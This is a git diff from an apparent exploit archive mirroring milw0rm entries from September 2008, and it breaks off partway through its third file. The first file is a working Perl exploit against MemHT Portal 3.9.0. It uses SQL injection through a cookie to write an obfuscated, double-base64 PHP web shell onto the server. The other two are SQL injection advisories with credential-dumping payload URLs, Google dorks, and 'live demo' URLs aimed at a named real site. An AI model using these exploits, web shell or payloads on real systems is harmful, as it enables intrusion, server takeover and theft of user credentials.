-my $shell = '\%3C\%3Fphp\%20\%24s\%3D\%27YVhOelpYUW9KRjlRVDFOVVd5ZHdhSEJwYm1adkoxMHBQMlJwWlNod2FIQnBibVp2S0NrcE9q'
-.'QTdKR0ZzYkdZOUp6eGthWFlnWTJ4aGMzTTlJbUp2ZUNJK0p6c2thRDF2Y0dWdVpHbHlLQ2N1SnlrN2QyaHBiR1VvUmtGTVUwVWhQ'
-.'VDBvSkdZOWNtVmhaR1JwY2lna2FDa3BLWHNrWVd4c1ppNDlKR1l1Snp4aWNpOCtKenQ5Q2lSbGNqMGtabXc5SnljN0pITnRQU2M4'
-.'WkdsMklHTnNZWE56UFNKdVptOGlQa2x1Wm04NlczTmhabVZmYlc5a1pUMG5MbWx1YVY5blpYUW9KM05oWm1WZmJXOWtaU2NwTGlk'
-.'ZEptNWljM0E3VzJkc2IySmhiSE05Snk1cGJtbGZaMlYwS0NkeVpXZHBjM1JsY2w5bmJHOWlZV3h6SnlrdUoxMG1ibUp6Y0R0YmJX'
-.'Rm5hV05mY1hWdmRHVnpYMmR3WXowbkxtbHVhVjluWlhRb0oyMWhaMmxqWDNGMWIzUmxjMTluY0dNbktTNG5YU1p1WW5Od08xdGth'
-.'WE5oWW14bFpGOW1kVzVqZEdsdmJuTTlKeTVwYm1sZloyVjBLQ2RrYVhOaFlteGxaRjltZFc1amRHbHZibk1uS1M0blhTWnVZbk53'
-.'T3p4aWNpOCtXM0JvY0RvbkxuQm9jSFpsY25OcGIyNG9LUzRuWFNadVluTndPMXQxYzJWeU9pY3VaMlYwWDJOMWNuSmxiblJmZFhO'
-.'bGNpZ3BMaWRkSm01aWMzQTdQR0p5THo1YmRXNWhiV1U2Snk1d2FIQmZkVzVoYldVb0tTNG5YU1p1WW5Od096d3ZaR2wyUGp4aWNp'
-.'OCtKenNLYVdZb2FYTnpaWFFvSkY5UVQxTlVXeWR6WlhRblhTa3BlMmxtS0dselgzVndiRzloWkdWa1gyWnBiR1VvSkY5R1NVeEZV'
-.'MXNuWm1rblhWc25kRzF3WDI1aGJXVW5YU2twSUdsbUtDRnRiM1psWDNWd2JHOWhaR1ZrWDJacGJHVW9KRjlHU1V4RlUxc25abWtu'
-.'WFZzbmRHMXdYMjVoYldVblhTd2tYMFpKVEVWVFd5ZG1hU2RkV3lkdVlXMWxKMTBwS1NBa2MyMHVQU2M4YzNCaGJpQmpiR0Z6Y3ow'
-.'aVpYSnliM0lpUGtOdmRXeGtJRzV2ZENCdGIzWmxJSFZ3Ykc5aFpHVmtJR1pwYkdVaFBDOXpjR0Z1UGljN0NtbG1LQ0ZsYlhCMGVT'
-.'Z2tYMUJQVTFSYkoyVjJZV3duWFNrcGUyOWlYM04wWVhKMEtDazdaWFpoYkNna1gxQlBVMVJiSjJWMllXd25YU2s3SkhOdExqMXZZ'
-.'bDluWlhSZlkyeGxZVzRvS1R0OUlXVnRjSFI1S0NSZlVFOVRWRnNuWlhobFl5ZGRLVDhrYzIwdVBTYzhjSEpsUGljdVlDUmZVRTlU'
-.'VkZ0bGVHVmpYV0F1Snp3dmNISmxQaWM2TURzaFpXMXdkSGtvSkY5UVQxTlVXeWQyWmlkZEtUOGtabXc5YUdsbmFHeHBaMmgwWDJa'
-.'cGJHVW9KRjlRVDFOVVd5ZDJaaWRkS1Rvd08zMEtaV05vYnlBblBHaDBiV3crUEdobFlXUStQSFJwZEd4bFBpNHVMblJ0Y0NCemFH'
-.'VnNiQzR1TGp3dmRHbDBiR1UrUEcxbGRHRWdhSFIwY0MxbGNYVnBkajBpUTI5dWRHVnVkQzFVZVhCbElpQmpiMjUwWlc1MFBTSjBa'
-.'WGgwTDJoMGJXdzdJR05vWVhKelpYUTlkMmx1Wkc5M2N5MHhNalV4SWk4K0NqeHpkSGxzWlNCMGVYQmxQU0owWlhoMEwyTnpjeUkr'
-.'Q21KdlpIbDdabTl1ZEMxbVlXMXBiSGs2ZG1WeVpHRnVZU3hoY21saGJDeHpaWEpwWmp0aVlXTnJaM0p2ZFc1a0xXTnZiRzl5T2lN'
-.'ek16TTdZMjlzYjNJNkkyWTVaamxtT1R0bWIyNTBMWE5wZW1VNk1UQndlRHQ5Q2k1aWIzaDdjRzl6YVhScGIyNDZjbVZzWVhScGRt'
-.'VTdabXh2WVhRNmJHVm1kRHRpYjNKa1pYSTZNWEI0SUhOdmJHbGtJQ00yTmpZN1ltRmphMmR5YjNWdVpDMWpiMnh2Y2pvak16TXpP'
-.'MjFoY21kcGJqbzFPMjFoY21kcGJpMTBiM0E2TWpCd2VEdHdZV1JrYVc1bk9qRXdjSGc3ZDJsa2RHZzZZWFYwYnp0OUNpNXVabTk3'
-.'WW05eVpHVnlPakZ3ZUNCemIyeHBaQ0FqT1RrNU8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6WTJOanR3WVdSa2FXNW5PalZ3ZUR0'
-.'OUNpNW9hV1JsZTJOdmJHOXlPaU0wTkRRN2ZXbHVjSFYwZTJKaFkydG5jbTkxYm1RdFkyOXNiM0k2SXpZMk5qdGliM0prWlhJNk1Y'
-.'QjRJSE52Ykdsa0lDTTVPVGs3ZlhSaFlteGxlMlp2Ym5RdGMybDZaVG94TUhCNE8ySnZjbVJsY2kxamIyeHNZWEJ6WlRwamIyeHNZ'
-.'WEJ6WlR0OWFXNXdkWFI3YldGeVoybHVPakp3ZUR0OUNqd3ZjM1I1YkdVK1BDOW9aV0ZrUGp4aWIyUjVQaWN1SkdGc2JHWXVKend2'
-.'WkdsMlBpY3VKR1pzTGljOFpHbDJJR05zWVhOelBTSmliM2dpUGljdUpITnRMaWNLUEdadmNtMGdaVzVqZEhsd1pUMGliWFZzZEds'
-.'d1lYSjBMMlp2Y20wdFpHRjBZU0lnWVdOMGFXOXVQU0lpSUcxbGRHaHZaRDBpY0c5emRDSStDanh3UGp4cGJuQjFkQ0IwZVhCbFBT'
-.'SnpkV0p0YVhRaUlHNWhiV1U5SW5Cb2NHbHVabThpSUhaaGJIVmxQU0p3YUhCcGJtWnZJaTgrUEM5d1BqeDBZV0pzWlQ0S1BIUnlQ'
-.'angwWkQ1MWNHeHZZV1E2UEM5MFpENDhkR1ErUEdsdWNIVjBJSFI1Y0dVOUltWnBiR1VpSUc1aGJXVTlJbVpwSWk4K1BDOTBaRDQ4'
-.'TDNSeVBnbzhkSEkrUEhSa1BtTnRaRG84TDNSa1BqeDBaRDQ4YVc1d2RYUWdkSGx3WlQwaWRHVjRkQ0lnYm1GdFpUMGlaWGhsWXlJ'
-.'Z2RtRnNkV1U5SWlJdlBqd3ZkR1ErUEM5MGNqNEtQSFJ5UGp4MFpENWxkbUZzT2p3dmRHUStQSFJrUGp4cGJuQjFkQ0IwZVhCbFBT'
-.'SjBaWGgwSWlCdVlXMWxQU0psZG1Gc0lpQjJZV3gxWlQwaUlpOCtQQzkwWkQ0OEwzUnlQZ284ZEhJK1BIUmtQblpwWlhjZ1ptbHNa'
-.'VG84TDNSa1BqeDBaRDQ4YVc1d2RYUWdkSGx3WlQwaWRHVjRkQ0lnYm1GdFpUMGlkbVlpSUhaaGJIVmxQU0lpUGladVluTndPeTlw'
-.'Ym1OZlkyOXVabWxuTG5Cb2NDQS9JRHNwUEM5MFpENDhMM1J5UGp3dmRHRmliR1UrUEhBK0NqeHBibkIxZENCMGVYQmxQU0p6ZFdK'
-.'dGFYUWlJRzVoYldVOUluTmxkQ0lnZG1Gc2RXVTlJazlySWk4K1BDOXdQZ284TDJadmNtMCtQSE53WVc0Z1kyeGhjM005SW1ocFpH'
-.'VWlQbUo1SUVGdGN5QW9ZV3RoSUdGNE16TXdaQ2s4TDNOd1lXNCtQQzlrYVhZK1BDOWliMlI1UGp3dmFIUnRiRDRuT3c9PQ==\%27'
-.'\%3Beval\%28base64_decode\%28base64_decode\%28\%24s\%29\%29\%29\%3B';
-
-#	You can add more :P
-my @paths = qw(
-	/var/www/htdocs /var/www/localhost/htdocs /var/www /var/wwww/hosting /var/www/html /var/www/vhosts
-	/home/www  home/httpd/vhosts
-	/usr/local/apache/htdocs
-	/www/htdocs
-);
-
-if($serv_path ne '-b') {
-	@paths = ($serv_path);
-}
-
-exploit($expl_url);
-
-sub exploit {
-	
-	#	Defining vars.
-	my $url = pop @_;
-	
-	print "\n\tExploiting $url\n";
-	
-	my($host, $path, $packet, $rcvd);
-    $url =~ s#http://(.*?)(|/(.*?))\z#$host=$1 and ($path=$2)=~s/\/\z//#e;
-	
-	#	Trying to get /cron.php to get server path
-	$packet = "POST $path/cron.php HTTP/1.1\r\n";
-	$packet .= "Host: $host\r\n";
-	$packet .= "Connection: Close\r\n";
-	$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
-	$rcvd = send_pckt($host, $packet, 1);
-	
-	if( ! $rcvd) {
-		print "\n\tUnable to connect to http://$host\n\n";
-		exit;
-	}
-	if ($rcvd =~ /Undefined variable:/) {
-		$rcvd =~ /f\s+in\s+(.*?)$path\/inc\/inc_readConfig/;
-		@paths = ($1);
-		print "\n\tFound path!\n";
-	} else {
-		print "\n\tStarting bruteforce...\n";
-	}
-	
-	#	Some bruteforce here if path is not defined
-	foreach $serv_path (@paths) {
-		
-		print ("\n\tTesting $serv_path$path$def_shell ...\n");
-		#	Sending poisoned request
-		$packet = "POST $path/index.php HTTP/1.1\r\n";
-		$packet .= "Host: $host\r\n";
-		$packet .= "Cookie: stats_res=1680x1050' UNION SELECT '$shell ' into outfile '$serv_path$path$def_shell'--\%20\r\n";
-		$packet .= "Connection: Close\r\n";
-		$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
-		
-		if( ! send_pckt($host, $packet)) {
-			print "\n\tUnable to connect to http://$host\n\n";
-			exit;
-		}
-	}
-
-	#	Checking for shell presence
-	$packet = "POST $path$def_shell HTTP/1.1\r\n";
-	$packet .= "Host: $host\r\n";
-	$packet .= "Connection: Close\r\n";
-	$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
-	
-	sleep(1);
-	$rcvd = send_pckt($host, $packet, 1);
-	if( ! $rcvd) {
-		print "\n\tUnable to connect to http://$host\n\n";
-		exit;
-	}
-
-	if ($rcvd =~ /tmp\s+shell/) {
-		print "\n\tExploited!\n\n";
-	} else {
-		print "\n\tExploiting failed.\n\n";
-	}
-	
-}
-
-sub send_pckt() {
-		
-	my $dat = 1;
-	my ($host, $packet, $ret) = @_;
-	my $socket = IO::Socket::INET->new(
-		Proto=>"tcp",
-		PeerAddr=>$host,
-		PeerPort=>"80"
-	);
-	if( ! $socket) {
-		return 0;
-	} else {
-		
-		print $socket $packet;
-		if($ret) {
-			my $rcv;
-			while($rcv = <$socket>) {
-			$dat .= $rcv;
-			}
-		}
-		close $socket;
-		return $dat;
-	}
-}
-
-sub usage {
-	print "\n\tUsage:\texpl.pl host [-b|full server path]
-
-	(by default exlpoit checks /cron.php file errors to get real path,
-	otherwise it will brute if failed, if used -b or none path is mentioned)
-
-	Example:\t$0 http://localhost/ /var/www/htdocs
-			$0 http://localhost/ -b
-			$0 http://localhost/\n\n";
-	exit;
-}
-
-# milw0rm.com [2008-09-06]
+#!/usr/bin/perl
+#
+# MemHT Portal <= 3.9.0 Perl exploit
+#
+# discovered & written by Ams
+# ax330d [doggy] gmail [dot] com
+#
+# DESCRIPTION:
+#	Script /inc/inc_statistics.php accepts unfiltered $_COOKIE's,
+#	($_COOKIE['stats_res']) which later goes to MySQL request. So we are able to make
+#	sql injection.
+#	This exploit tries to create shell in /uploads/media/defined.php.
+#
+# NEEDED:
+#	magic_quotes_gpc = off
+#	MySQL should be able to write to file
+#	Know full server path to portal
+
+use strict;
+use warnings;
+use IO::Socket;
+
+print "
+	~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+	MemHT portal <= 3.9.0 Perl exploit
+	~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+	";
+
+@ARGV or &usage ;
+my $expl_url = shift;
+$expl_url =~ m#http://# or &usage;
+my $serv_path = shift || '-b';
+my $def_shell = '/uploads/media/defined.php';
+
+my $shell = '\%3C\%3Fphp\%20\%24s\%3D\%27YVhOelpYUW9KRjlRVDFOVVd5ZHdhSEJwYm1adkoxMHBQMlJwWlNod2FIQnBibVp2S0NrcE9q'
+.'QTdKR0ZzYkdZOUp6eGthWFlnWTJ4aGMzTTlJbUp2ZUNJK0p6c2thRDF2Y0dWdVpHbHlLQ2N1SnlrN2QyaHBiR1VvUmtGTVUwVWhQ'
+.'VDBvSkdZOWNtVmhaR1JwY2lna2FDa3BLWHNrWVd4c1ppNDlKR1l1Snp4aWNpOCtKenQ5Q2lSbGNqMGtabXc5SnljN0pITnRQU2M4'
+.'WkdsMklHTnNZWE56UFNKdVptOGlQa2x1Wm04NlczTmhabVZmYlc5a1pUMG5MbWx1YVY5blpYUW9KM05oWm1WZmJXOWtaU2NwTGlk'
+.'ZEptNWljM0E3VzJkc2IySmhiSE05Snk1cGJtbGZaMlYwS0NkeVpXZHBjM1JsY2w5bmJHOWlZV3h6SnlrdUoxMG1ibUp6Y0R0YmJX'
+.'Rm5hV05mY1hWdmRHVnpYMmR3WXowbkxtbHVhVjluWlhRb0oyMWhaMmxqWDNGMWIzUmxjMTluY0dNbktTNG5YU1p1WW5Od08xdGth'
+.'WE5oWW14bFpGOW1kVzVqZEdsdmJuTTlKeTVwYm1sZloyVjBLQ2RrYVhOaFlteGxaRjltZFc1amRHbHZibk1uS1M0blhTWnVZbk53'
+.'T3p4aWNpOCtXM0JvY0RvbkxuQm9jSFpsY25OcGIyNG9LUzRuWFNadVluTndPMXQxYzJWeU9pY3VaMlYwWDJOMWNuSmxiblJmZFhO'
+.'bGNpZ3BMaWRkSm01aWMzQTdQR0p5THo1YmRXNWhiV1U2Snk1d2FIQmZkVzVoYldVb0tTNG5YU1p1WW5Od096d3ZaR2wyUGp4aWNp'
+.'OCtKenNLYVdZb2FYTnpaWFFvSkY5UVQxTlVXeWR6WlhRblhTa3BlMmxtS0dselgzVndiRzloWkdWa1gyWnBiR1VvSkY5R1NVeEZV'
+.'MXNuWm1rblhWc25kRzF3WDI1aGJXVW5YU2twSUdsbUtDRnRiM1psWDNWd2JHOWhaR1ZrWDJacGJHVW9KRjlHU1V4RlUxc25abWtu'
+.'WFZzbmRHMXdYMjVoYldVblhTd2tYMFpKVEVWVFd5ZG1hU2RkV3lkdVlXMWxKMTBwS1NBa2MyMHVQU2M4YzNCaGJpQmpiR0Z6Y3ow'
+.'aVpYSnliM0lpUGtOdmRXeGtJRzV2ZENCdGIzWmxJSFZ3Ykc5aFpHVmtJR1pwYkdVaFBDOXpjR0Z1UGljN0NtbG1LQ0ZsYlhCMGVT'
+.'Z2tYMUJQVTFSYkoyVjJZV3duWFNrcGUyOWlYM04wWVhKMEtDazdaWFpoYkNna1gxQlBVMVJiSjJWMllXd25YU2s3SkhOdExqMXZZ'
+.'bDluWlhSZlkyeGxZVzRvS1R0OUlXVnRjSFI1S0NSZlVFOVRWRnNuWlhobFl5ZGRLVDhrYzIwdVBTYzhjSEpsUGljdVlDUmZVRTlU'
+.'VkZ0bGVHVmpYV0F1Snp3dmNISmxQaWM2TURzaFpXMXdkSGtvSkY5UVQxTlVXeWQyWmlkZEtUOGtabXc5YUdsbmFHeHBaMmgwWDJa'
+.'cGJHVW9KRjlRVDFOVVd5ZDJaaWRkS1Rvd08zMEtaV05vYnlBblBHaDBiV3crUEdobFlXUStQSFJwZEd4bFBpNHVMblJ0Y0NCemFH'
+.'VnNiQzR1TGp3dmRHbDBiR1UrUEcxbGRHRWdhSFIwY0MxbGNYVnBkajBpUTI5dWRHVnVkQzFVZVhCbElpQmpiMjUwWlc1MFBTSjBa'
+.'WGgwTDJoMGJXdzdJR05vWVhKelpYUTlkMmx1Wkc5M2N5MHhNalV4SWk4K0NqeHpkSGxzWlNCMGVYQmxQU0owWlhoMEwyTnpjeUkr'
+.'Q21KdlpIbDdabTl1ZEMxbVlXMXBiSGs2ZG1WeVpHRnVZU3hoY21saGJDeHpaWEpwWmp0aVlXTnJaM0p2ZFc1a0xXTnZiRzl5T2lN'
+.'ek16TTdZMjlzYjNJNkkyWTVaamxtT1R0bWIyNTBMWE5wZW1VNk1UQndlRHQ5Q2k1aWIzaDdjRzl6YVhScGIyNDZjbVZzWVhScGRt'
+.'VTdabXh2WVhRNmJHVm1kRHRpYjNKa1pYSTZNWEI0SUhOdmJHbGtJQ00yTmpZN1ltRmphMmR5YjNWdVpDMWpiMnh2Y2pvak16TXpP'
+.'MjFoY21kcGJqbzFPMjFoY21kcGJpMTBiM0E2TWpCd2VEdHdZV1JrYVc1bk9qRXdjSGc3ZDJsa2RHZzZZWFYwYnp0OUNpNXVabTk3'
+.'WW05eVpHVnlPakZ3ZUNCemIyeHBaQ0FqT1RrNU8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6WTJOanR3WVdSa2FXNW5PalZ3ZUR0'
+.'OUNpNW9hV1JsZTJOdmJHOXlPaU0wTkRRN2ZXbHVjSFYwZTJKaFkydG5jbTkxYm1RdFkyOXNiM0k2SXpZMk5qdGliM0prWlhJNk1Y'
+.'QjRJSE52Ykdsa0lDTTVPVGs3ZlhSaFlteGxlMlp2Ym5RdGMybDZaVG94TUhCNE8ySnZjbVJsY2kxamIyeHNZWEJ6WlRwamIyeHNZ'
+.'WEJ6WlR0OWFXNXdkWFI3YldGeVoybHVPakp3ZUR0OUNqd3ZjM1I1YkdVK1BDOW9aV0ZrUGp4aWIyUjVQaWN1SkdGc2JHWXVKend2'
+.'WkdsMlBpY3VKR1pzTGljOFpHbDJJR05zWVhOelBTSmliM2dpUGljdUpITnRMaWNLUEdadmNtMGdaVzVqZEhsd1pUMGliWFZzZEds'
+.'d1lYSjBMMlp2Y20wdFpHRjBZU0lnWVdOMGFXOXVQU0lpSUcxbGRHaHZaRDBpY0c5emRDSStDanh3UGp4cGJuQjFkQ0IwZVhCbFBT'
+.'SnpkV0p0YVhRaUlHNWhiV1U5SW5Cb2NHbHVabThpSUhaaGJIVmxQU0p3YUhCcGJtWnZJaTgrUEM5d1BqeDBZV0pzWlQ0S1BIUnlQ'
+.'angwWkQ1MWNHeHZZV1E2UEM5MFpENDhkR1ErUEdsdWNIVjBJSFI1Y0dVOUltWnBiR1VpSUc1aGJXVTlJbVpwSWk4K1BDOTBaRDQ4'
+.'TDNSeVBnbzhkSEkrUEhSa1BtTnRaRG84TDNSa1BqeDBaRDQ4YVc1d2RYUWdkSGx3WlQwaWRHVjRkQ0lnYm1GdFpUMGlaWGhsWXlJ'
+.'Z2RtRnNkV1U5SWlJdlBqd3ZkR1ErUEM5MGNqNEtQSFJ5UGp4MFpENWxkbUZzT2p3dmRHUStQSFJrUGp4cGJuQjFkQ0IwZVhCbFBT'
+.'SjBaWGgwSWlCdVlXMWxQU0psZG1Gc0lpQjJZV3gxWlQwaUlpOCtQQzkwWkQ0OEwzUnlQZ284ZEhJK1BIUmtQblpwWlhjZ1ptbHNa'
+.'VG84TDNSa1BqeDBaRDQ4YVc1d2RYUWdkSGx3WlQwaWRHVjRkQ0lnYm1GdFpUMGlkbVlpSUhaaGJIVmxQU0lpUGladVluTndPeTlw'
+.'Ym1OZlkyOXVabWxuTG5Cb2NDQS9JRHNwUEM5MFpENDhMM1J5UGp3dmRHRmliR1UrUEhBK0NqeHBibkIxZENCMGVYQmxQU0p6ZFdK'
+.'dGFYUWlJRzVoYldVOUluTmxkQ0lnZG1Gc2RXVTlJazlySWk4K1BDOXdQZ284TDJadmNtMCtQSE53WVc0Z1kyeGhjM005SW1ocFpH'
+.'VWlQbUo1SUVGdGN5QW9ZV3RoSUdGNE16TXdaQ2s4TDNOd1lXNCtQQzlrYVhZK1BDOWliMlI1UGp3dmFIUnRiRDRuT3c9PQ==\%27'
+.'\%3Beval\%28base64_decode\%28base64_decode\%28\%24s\%29\%29\%29\%3B';
+
+#	You can add more :P
+my @paths = qw(
+	/var/www/htdocs /var/www/localhost/htdocs /var/www /var/wwww/hosting /var/www/html /var/www/vhosts
+	/home/www  home/httpd/vhosts
+	/usr/local/apache/htdocs
+	/www/htdocs
+);
+
+if($serv_path ne '-b') {
+	@paths = ($serv_path);
+}
+
+exploit($expl_url);
+
+sub exploit {
+	
+	#	Defining vars.
+	my $url = pop @_;
+	
+	print "\n\tExploiting $url\n";
+	
+	my($host, $path, $packet, $rcvd);
+    $url =~ s#http://(.*?)(|/(.*?))\z#$host=$1 and ($path=$2)=~s/\/\z//#e;
+	
+	#	Trying to get /cron.php to get server path
+	$packet = "POST $path/cron.php HTTP/1.1\r\n";
+	$packet .= "Host: $host\r\n";
+	$packet .= "Connection: Close\r\n";
+	$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
+	$rcvd = send_pckt($host, $packet, 1);
+	
+	if( ! $rcvd) {
+		print "\n\tUnable to connect to http://$host\n\n";
+		exit;
+	}
+	if ($rcvd =~ /Undefined variable:/) {
+		$rcvd =~ /f\s+in\s+(.*?)$path\/inc\/inc_readConfig/;
+		@paths = ($1);
+		print "\n\tFound path!\n";
+	} else {
+		print "\n\tStarting bruteforce...\n";
+	}
+	
+	#	Some bruteforce here if path is not defined
+	foreach $serv_path (@paths) {
+		
+		print ("\n\tTesting $serv_path$path$def_shell ...\n");
+		#	Sending poisoned request
+		$packet = "POST $path/index.php HTTP/1.1\r\n";
+		$packet .= "Host: $host\r\n";
+		$packet .= "Cookie: stats_res=1680x1050' UNION SELECT '$shell ' into outfile '$serv_path$path$def_shell'--\%20\r\n";
+		$packet .= "Connection: Close\r\n";
+		$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
+		
+		if( ! send_pckt($host, $packet)) {
+			print "\n\tUnable to connect to http://$host\n\n";
+			exit;
+		}
+	}
+
+	#	Checking for shell presence
+	$packet = "POST $path$def_shell HTTP/1.1\r\n";
+	$packet .= "Host: $host\r\n";
+	$packet .= "Connection: Close\r\n";
+	$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
+	
+	sleep(1);
+	$rcvd = send_pckt($host, $packet, 1);
+	if( ! $rcvd) {
+		print "\n\tUnable to connect to http://$host\n\n";
+		exit;
+	}
+
+	if ($rcvd =~ /tmp\s+shell/) {
+		print "\n\tExploited!\n\n";
+	} else {
+		print "\n\tExploiting failed.\n\n";
+	}
+	
+}
+
+sub send_pckt() {
+		
+	my $dat = 1;
+	my ($host, $packet, $ret) = @_;
+	my $socket = IO::Socket::INET->new(
+		Proto=>"tcp",
+		PeerAddr=>$host,
+		PeerPort=>"80"
+	);
+	if( ! $socket) {
+		return 0;
+	} else {
+		
+		print $socket $packet;
+		if($ret) {
+			my $rcv;
+			while($rcv = <$socket>) {
+			$dat .= $rcv;
+			}
+		}
+		close $socket;
+		return $dat;
+	}
+}
+
+sub usage {
+	print "\n\tUsage:\texpl.pl host [-b|full server path]
+
+	(by default exlpoit checks /cron.php file errors to get real path,
+	otherwise it will brute if failed, if used -b or none path is mentioned)
+
+	Example:\t$0 http://localhost/ /var/www/htdocs
+			$0 http://localhost/ -b
+			$0 http://localhost/\n\n";
+	exit;
+}
+
+# milw0rm.com [2008-09-06]
diff --git a/platforms/php/webapps/6395.txt b/platforms/php/webapps/6395.txt
index 10c742b78..7973912d6 100755
--- a/platforms/php/webapps/6395.txt
+++ b/platforms/php/webapps/6395.txt
@@ -1,45 +1,45 @@
-########################## www.BugReport.ir #######################################
-#
-#        AmnPardaz Security Research Team
-#
-# Title: Masir Camp E-Shop Module <= 3.0 SQL Injection
-# Vendor: www.masir.net
-# Vulnerable Version: 3.0 and prior versions
-# Exploit: Available
-# Impact: Medium
-# Fix: N/A
-# Original Advisory: http://bugreport.ir/index_52.htm
-###################################################################################
-
-####################
-1. Description:
-####################
-    Masir Camp is an advanced website management and content management software. It is suitable for management, control and information presentation.
-"Masir Camp" increases your ability to manage and control your website or weblog.It use Microsoft .Net and MS-SQL. But you have no limitation to use other DBMSs.
-
-####################
-2. Vulnerabilities:
-####################
-    2.1. Injection Flaws. SQL Injection in "veiworderstatus" in "ordercode" parameter.
-
-
-####################
-3. Exploits/POCs:
-####################
-    http://[URL]/?page=veiworderstatus&ordercode=foo' or 1=(select top 1 UserName from UserInfoView)--
-    http://[URL]/?page=veiworderstatus&ordercode=foo' or 1=(select top 1 Password from UserInfoView)--
-
-####################
-4. Solution:
-####################
-    Edit the source code to ensure that inputs are properly sanitized.
-
-####################
-5. Credit:
-####################
-AmnPardaz Security Research & Penetration Testing Group
-Contact: admin[4t}bugreport{d0t]ir
-www.BugReport.ir
-www.AmnPardaz.com
-
-# milw0rm.com [2008-09-07]
+########################## www.BugReport.ir #######################################
+#
+#        AmnPardaz Security Research Team
+#
+# Title: Masir Camp E-Shop Module <= 3.0 SQL Injection
+# Vendor: www.masir.net
+# Vulnerable Version: 3.0 and prior versions
+# Exploit: Available
+# Impact: Medium
+# Fix: N/A
+# Original Advisory: http://bugreport.ir/index_52.htm
+###################################################################################
+
+####################
+1. Description:
+####################
+    Masir Camp is an advanced website management and content management software. It is suitable for management, control and information presentation.
+"Masir Camp" increases your ability to manage and control your website or weblog.It use Microsoft .Net and MS-SQL. But you have no limitation to use other DBMSs.
+
+####################
+2. Vulnerabilities:
+####################
+    2.1. Injection Flaws. SQL Injection in "veiworderstatus" in "ordercode" parameter.
+
+
+####################
+3. Exploits/POCs:
+####################
+    http://[URL]/?page=veiworderstatus&ordercode=foo' or 1=(select top 1 UserName from UserInfoView)--
+    http://[URL]/?page=veiworderstatus&ordercode=foo' or 1=(select top 1 Password from UserInfoView)--
+
+####################
+4. Solution:
+####################
+    Edit the source code to ensure that inputs are properly sanitized.
+
+####################
+5. Credit:
+####################
+AmnPardaz Security Research & Penetration Testing Group
+Contact: admin[4t}bugreport{d0t]ir
+www.BugReport.ir
+www.AmnPardaz.com
+
+# milw0rm.com [2008-09-07]
diff --git a/platforms/php/webapps/6396.txt b/platforms/php/webapps/6396.txt
index 569caf772..9a21abb13 100755
--- a/platforms/php/webapps/6396.txt
+++ b/platforms/php/webapps/6396.txt
@@ -1,61 +1,61 @@
-################################################################ 
-#       .___             __          _______       .___        # 
-#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
-#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
-#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
-#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
-#        \/                  \/             \/                 # 
-#                   ___________   ______  _  __                # 
-#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
-#                 \  \___|  | \/\  ___/\     /                 # 
-#                  \___  >__|    \___  >\/\_/                  # 
-#      est.2007        \/            \/   forum.darkc0de.com   # 
-################################################################ 
-# --d3hydr8 - rsauron - baltazar - sinner_01 - C1c4Tr1Z - beenu# 
-#  ---  QKrun1x  - skillfaker - FeDeReR - Optyx - Nuclear  
-#                   and all darkc0de members                ---# 
-################################################################ 
-# 
-# Author: r45c4l and P47r1ck 
-# 
-# Home  : www.darkc0de.com 
-# 
-# Email : r45c4l@hotmail.com, p47r1ckro[at]gmail[dot]com
-# 
-# Share the c0de! 
-# 
-################################################################ 
-# 
-# Exploit: Altrasoft Forum (cat) Remote SQL Injection Vulnerability
-#
-#
-# App Name:  AlstraSoft Forum 
-# 
-# App Home: http://www.alstrasoft.com/
-# 
-# Dork: inurl:index.php?menu=showcat=
-# Dork2: Powered By AlstraSoft Forum Pay Per Post Exchange
-# 
-# 
-# 
-# 
-# 
-# POC: For Admin id and pass
-#      index.php?menu=showcat&cat=-1+union+all+select+1,concat(auser,0x3a,apass),3+from+admin-- 
-# 
-# P0C-2: For Users id and pass
-#       index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+2,1--
-# 
-# Live Demo: (For admin)
-# 
-# http://payperpostpro.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(auser,0x3a,apass),3+from+admin--
-#  
-# Live Demo: (For Users)
-#  http://payperpostpro.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+1,1--
-#
-#
-# Admin panel is at http://site.com/admin 
-################################################################ 
-# Vuln Discovered 7th Sep 2008 
-
-# milw0rm.com [2008-09-07]
+################################################################ 
+#       .___             __          _______       .___        # 
+#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
+#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
+#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
+#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
+#        \/                  \/             \/                 # 
+#                   ___________   ______  _  __                # 
+#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
+#                 \  \___|  | \/\  ___/\     /                 # 
+#                  \___  >__|    \___  >\/\_/                  # 
+#      est.2007        \/            \/   forum.darkc0de.com   # 
+################################################################ 
+# --d3hydr8 - rsauron - baltazar - sinner_01 - C1c4Tr1Z - beenu# 
+#  ---  QKrun1x  - skillfaker - FeDeReR - Optyx - Nuclear  
+#                   and all darkc0de members                ---# 
+################################################################ 
+# 
+# Author: r45c4l and P47r1ck 
+# 
+# Home  : www.darkc0de.com 
+# 
+# Email : r45c4l@hotmail.com, p47r1ckro[at]gmail[dot]com
+# 
+# Share the c0de! 
+# 
+################################################################ 
+# 
+# Exploit: Altrasoft Forum (cat) Remote SQL Injection Vulnerability
+#
+#
+# App Name:  AlstraSoft Forum 
+# 
+# App Home: http://www.alstrasoft.com/
+# 
+# Dork: inurl:index.php?menu=showcat=
+# Dork2: Powered By AlstraSoft Forum Pay Per Post Exchange
+# 
+# 
+# 
